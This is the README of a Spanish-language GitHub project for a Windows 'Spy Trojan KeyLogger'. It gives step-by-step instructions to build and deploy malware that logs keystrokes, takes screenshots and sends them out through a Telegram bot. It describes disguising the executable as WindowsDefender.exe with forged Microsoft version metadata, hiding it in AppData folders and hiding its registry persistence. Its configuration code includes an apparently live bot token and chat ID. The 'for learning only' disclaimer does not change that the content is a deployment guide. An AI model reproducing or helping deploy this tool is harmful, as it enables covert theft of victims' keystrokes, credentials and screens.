SebastianEPH / Spytrojan_keylogger
Programming Languages
Projects that are alternatives of or similar to Spytrojan keylogger
█▀ █▀█ █▄█ ▀█▀ █▀█ █▀█ █ ▄▀█ █▄ █ █▄▀ █▀▀ █▄█ █ █▀█ █▀▀ █▀▀ █▀▀ █▀█
▄█ █▀▀ █ █ █▀▄ █▄█ █▄█ █▀█ █ ▀█ █ █ ██▄ █ █▄▄ █▄█ █▄█ █▄█ ██▄ █▀▄ v6.0
¡ Nota importante !:
Ésta herramienta tiene como único proposito general, el aprendizaje de ___"Seguridad en sistemas informáticos"___, el creador no se hace responsable por un posible mal uso de ésta herramienta.
Información
-
Developed by:
SebastianEPH
-
Product name:
Spy Trojan KeyLogger
-
Type software:
Trojan
-
File version:
v6.0
-
Architecture:
x86 bits || x64 bits
-
State:
Stable
-
Size:
NULL
-
Undetectable:
Not Tester
-
Plataform:
Only Windows 7, 8.1, 10
-
Programming language:
Python >3.6 <3.9
-
Licence:
GNU Licence
-
IDE or text editor:
PyCharm 2020 Education
-
Documentation date:
11/12/20
-
Description:
Advanced Keylogger | send Telegram bot
Carpeta Principal
-
.git:
Lista de cambios
<= ignorar -
.idea:
Información del IDE
<= ignorar -
Doc:
Web => en proceso...
<= ignorar -
venv:
Entorno_virtual de python
<= ignorar -
# Create .EXE [InfectionFile]-[Debug].bat:
Convierte en ejecutable *.exe, pero al iniciarlo se mostrará la consola
<= para uso de debuggeo -
# Create .EXE [InfectionFile]-[Release].bat:
Convierte en ejecutable, y al iniciarlo, será de modo oculto, sin Consola
<= Es el proyecto finalizado -
# Create .EXE [SpyTrojan]-[Debug].bat:
Convierte en ejecutable *.exe, pero al abrirlo se mostrará la consola
<= para uso de debuggeo -
# Create .EXE [SpyTrojan]-[Release].bat:
Convierte en ejecutable, y al iniciarlo, será de modo oculto, sin Consola
<= Es el proyecto finalizado -
#=[Infection] Run.bat:
Ejecuta en consola el archivo InfectionFile
<= para uso de debuggeo -
#=[SpyTrojan] Run.bat:
Ejecuta en consola el archivo SpyTrojan
<= para uso de debuggeo -
.gitignore:
Lista de archivos y carpetas sin seguimiento
<= ignorar -
ConfigKey.ini:
Archivo de configuración del keylogger
<= No habilitado en está versión -
icon_infection_file.ico:
Icono InfectionFile
<= puedes remplazarlo, pero no cambiarle de nombre -
icon_SpyTrojan.ico:
Icono SpyTrojan
<= puedes remplazarlo, pero no cambiarle de nombre -
InfectionFile .py:
Este script se encargará de infectar la computadora, y escribir en el registro.
<= Se debe configurar previamente -
info_exe_InfectionFile.txt:
Contiene la información del *.exe
<= lee la documentación -
info_exe_SpyTrojan.txt:
Contiene la información del *.exe
<= lee la documentación -
InstallRequirements.bat:
Instala las bibliotecas
<= Puede instalarlos manualmente - LICENSE
-
README .md:
Documentación
-
SpyTrojan .py:
Keyloggger TelegramBot
Caracteristicas
-
Configuración en registro: El software lee su configuración desde el registro de windows, El archivo
infectionFile.py
es el que se encarga de escribir en el registro, para que el keylogger pueda funcionar a la normalidad, tener la configuración en el registro tiene muchas ventajas, cómo activar o desactivar funcionalidades, hasta cambiar el token y el id a tiempo real. -
Segundo plano: Se ejecuta en segundo plano y sin ningún entorno gráfico o consola
NOTA: imagen no actual
-
Disfraz: Al momento de ser convertido de
*.py a *.exe
. El Keylogger será disfrazado comoWindowsDefender.exe
con el ícono y la información del programa.NOTA: imagen no actual
-
Oculto: Se oculta en carpetas estrañas del usuario.
-
Iniciar automaticamente con el sistema: Modifica el registro de windows, pero no aparece en el menú de StartUp
NOTA: El software no aparece en ésta lista
-
Multiples cuentas: Puede enviar los metadatos a distintas cuenta o grupos de telegram
-
Envio mediante Bot Telegram: Envia todos los datos mediante telegram
-
Screenshot: Toma capturas de pantalla con un intervalo personalizado
Uso de Recursos de la PC
El programa se repite 2 veces ya que ésta utiza 2 hilos de ejecución
Proceso de preparación:
NOTA: Como requisito mínimo para el aprendizaje de ésta herramienta es saber programar en Python básico.
1. Instalar todos los requerimientos
2. Crear y configurar un Bot de telegram Telegram
-
Entramos a BotFather.
-
Creamos un nuevo bot y obtenemos el Token privado
-
Ahora obtenemos nuestro
Chat ID
, esto se realiza para que solo el registro de teclas nos llegue a nosotros y no a cualquiera que encuentre el bot. -
Buscamos el Bot llamado Chat ID Echo y obtenemos nuestro Chat ID
-
Buscamos nuestro bot y la iniciamos...
SpyTrojan.py
3. Crear ejecutable del -
Paso 1: Abrir el archivo y remplazar la infomación según tus requerimientos.txt
Click para ver el contenido del archivo.
VSVersionInfo( ffi=FixedFileInfo( filevers=(6, 1, 7601, 17514), prodvers=(6, 1, 7601, 17514), mask=0x3f, flags=0x0, OS=0x40004, fileType=0x1, subtype=0x0, date=(0, 0) ), kids=[ StringFileInfo( [ StringTable( u'040904B0', [StringStruct(u'CompanyName', u'Microsoft Corporation'), StringStruct(u'FileDescription', u'Security Health Host Key'), StringStruct(u'FileVersion', u'6.1.7601.17514 (win7sp1_rtm.101119-1850)'), StringStruct(u'InternalName', u'Windows Security Health Host Key'), StringStruct(u'LegalCopyright', u'\xa9 Microsoft Corporation. All rights reserved.'), StringStruct(u'OriginalFilename', u'SecurityHealthHostKey.exe'), StringStruct(u'ProductName', u'Microsoft\xae Windows\xae Operating System'), StringStruct(u'ProductVersion', u'6.1.7601.17514')]) ]), VarFileInfo([VarStruct(u'Translation', [1033, 1200])]) ] )
-
Paso 2: Convertir *.py a *.exe
Click para ver más información
El archivo
# Create .EXE [SpyTrojan]-[Debug].bat
nos dará como resultado un *.exe pero al ejecutar el programa se mostrará la consola, con la finalidad de debuggear:-
Mensaje de Error o Exito de Screenshot
-
Teclas oprimidas a tiempo real
-
Mensaje de Error o Exito al conectarse al Bot
-
Mensaje de Error o Exito al envíar el registro mediante Telegram medíante un ID
-
Otros posibles errores de
import lib
-
El archivo
# Create .EXE [InfectionFile]-[Release].bat
es el software final, está se ejeuctará en segundo plano sin entorno grafico o consola. -
El ejecutable resultante se guardará en una carpeta con los nombres
[DEBUG]
,[RELEASE]
según sea el caso. -
Luego de terminar aparecerá en la consola
Press any key to continue...
-
Regresamos a la carpeta principal y notamos que tenemos nuevas carpetas y archivos, las cuales son archivos caché sin ninguna importancia, donde e encuentrá nuestro software es dentro de la carpeta
[DEBUG]
o[RELEASE]
. -
Compilación terminada:
-
-
Nota: Al abrir el *.exe resultante, ésta mandará error lo cuál es normal ya que el software lee información del registro
[REGEDIT]
, información que todavía no se han creado.
InfectionFile.py
4. Crear ejecutable del Este Archivo se encargará de escribir en el registro de windows la configuración de nuestro software, según estos datos, el software funcionará de una u otra manera.
-
Paso 1: Abrir el archivo
InfectionFile.py
para edidarlo.Ver código completo
if __name__ == '__main__': # Se habilitarán futuras actualizaciones AutoDestruction(pathReg=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide\AutoDestruction', active=0, active_now=0, # ignore, will be used in a future update day=00, year=0000 ).set_values() BombWindows(pathReg=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide\BombWindows', active=0, active_now=0, # ignore, will be used in a future update day=00, year=0000 ).set_values() Keylogger(pathReg=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide\Keylogger', active=1, #Cambie Aquí# limit=150 #Cambie Aquí# ).set_values() Screenshot(pathReg=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide\Screenshot', active=1, #Cambie Aquí# intervalSeconds=15,#Cambie Aquí# cache_path='C:\\Users\\' + str(os.getlogin()) + r'\AppData\Local\Microsoft\Office\16.0\Floodgate\temp' ).set_values() TelegramBot(path_registry=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide\TelegramBot', id=["-1001322369309"], #Cambie Aquí# token="1345614169:AAE7O_jRBhIkq_minXh52Ws2SV3wlPfp8QM", #Cambie Aquí# ).set_values() trojan = Trojan(path_registry=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide', debug=0, delay=0, path_software='C:\\Users\\' + str(os.getlogin()) + r'\AppData\Local\Microsoft\Windows\Shell\temp', name_software= 'SpyTrojan.exe', #Cambie Aquí# username=str(os.getlogin()) ) trojan.set_values() trojan.infection()
-
Paso 2: Cambiar configuración del
AutoDestruction # No disposible en ésta versión
-
Paso 3: Cambiar configuración del
BombWindows # No disposible en ésta versión
-
Paso 4: Cambiar configuración del
Keylogger
-
Paso 5: Cambiar configuración de
Screenshot
Ver código
Screenshot(pathReg=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide\Screenshot', active=1, # Screenhot Habilitado = 1 °° screenshot Habilitado = 1 intervalSeconds=15, # Intervalo en segundos de capturas de pantalla cache_path='C:\\Users\\' + str(os.getlogin()) + r'\AppData\Local\Microsoft\Office\16.0\Floodgate\temp' ).set_values()
-
Paso 6: Cambiar configuración de
TelegramBot
-
Paso 7: Cambiar configuración de
Software General
Ver código
trojan = Trojan(path_registry=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide', debug=0, # No disposible en ésta versión delay=0, # No disposible en ésta versión path_software='C:\\Users\\' + str(os.getlogin()) + r'\AppData\Local\Microsoft\Windows\Shell\temp', # No cambiar name_software= 'SpyTrojan.exe', # <= Ingrese el nombre del exe generado anteriormente: # Ejemplo: "SpyKeylogger.exe" username=str(os.getlogin()) # No cambiar ) trojan.set_values() trojan.infection()
-
Paso 8: Abrir el archivo y remplazar la infomación según tus requerimientos.txt
Click para ver el contenido del archivo.
VSVersionInfo( ffi=FixedFileInfo( filevers=(6, 1, 7601, 17514), prodvers=(6, 1, 7601, 17514), mask=0x3f, flags=0x0, OS=0x40004, fileType=0x1, subtype=0x0, date=(0, 0) ), kids=[ StringFileInfo( [ StringTable( u'040904B0', [StringStruct(u'CompanyName', u'Microsoft Corporation'), StringStruct(u'FileDescription', u'Security Health Host Key'), StringStruct(u'FileVersion', u'6.1.7601.17514 (win7sp1_rtm.101119-1850)'), StringStruct(u'InternalName', u'Windows Security Health Host Key'), StringStruct(u'LegalCopyright', u'\xa9 Microsoft Corporation. All rights reserved.'), StringStruct(u'OriginalFilename', u'SecurityHealthHostKey.exe'), StringStruct(u'ProductName', u'Microsoft\xae Windows\xae Operating System'), StringStruct(u'ProductVersion', u'6.1.7601.17514')]) ]), VarFileInfo([VarStruct(u'Translation', [1033, 1200])]) ] )
-
Paso 9: Convertir *.py a *.exe
Click para ver más información
El archivo
# Create .EXE [InfectionFile]-[Debug].bat
nos dará como resultado un *.exe pero al ejecutar el programa se mostrará la consola, con la finalidad de debuggear:-
Mensaje de Error o Exito escritura del registro
-
Mensaje de Error o Exito de replicar software en el sistema
-
Otros posibles errores de
import lib
-
El archivo
# Create .EXE [InfectionFile]-[Release].bat
es el software final, está se ejeuctará en segundo plano sin entorno grafico o consola. -
El ejecutable resultante se guardará en una carpeta con los nombres
[DEBUG]
,[RELEASE]
según sea el caso. -
Luego de terminar aparecerá en la consola
Press any key to continue...
-
Regresamos a la carpeta principal y notamos que tenemos nuevas carpetas y archivos, las cuales son archivos caché sin ninguna importancia, donde e encuentrá nuestro software es dentro de la carpeta
[DEBUG]
o[RELEASE]
. -
Compilación terminada:
-
Método de infección
Método de infección:
-
Colocamos en una carpeta los dos ejecutables que compilamos
-
InfectionFile.exe
yStyTrojan.exe
-
StyTrojan.exe
: Es el keylogger -
InfectionFile.exe
: Este archivo se encarga de escribir la configuracion en el registro de Windows y copiar nuestro archivoStyTrojan.exe
a una carpeta oculta en el sistema. -
Ejecutamos
InfectionFile.exe
y este se encargará de todo el trabajo -
Es importante que el nombre de nuestro keylogger sea exactamente igual en la cual colocamos en la configuración
Click para ver más información
trojan = Trojan(path_registry=r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Hide', debug=0, # No disposible en ésta versión delay=0, # No disposible en ésta versión path_software='C:\\Users\\' + str(os.getlogin()) + r'\AppData\Local\Microsoft\Windows\Shell\temp', # No cambiar name_software= 'SpyTrojan.exe', # <= Ingrese el nombre del exe generado anteriormente: # Ejemplo: "SpyKeylogger.exe" username=str(os.getlogin()) # No cambiar ) trojan.set_values() trojan.infection()
Bibliotecas personales utilizadas:
- CRUD RegeditWin for Python 3
By SebastianEPH
Nota: Contacteme solo si encontró un bug o desea aportar al repositorio.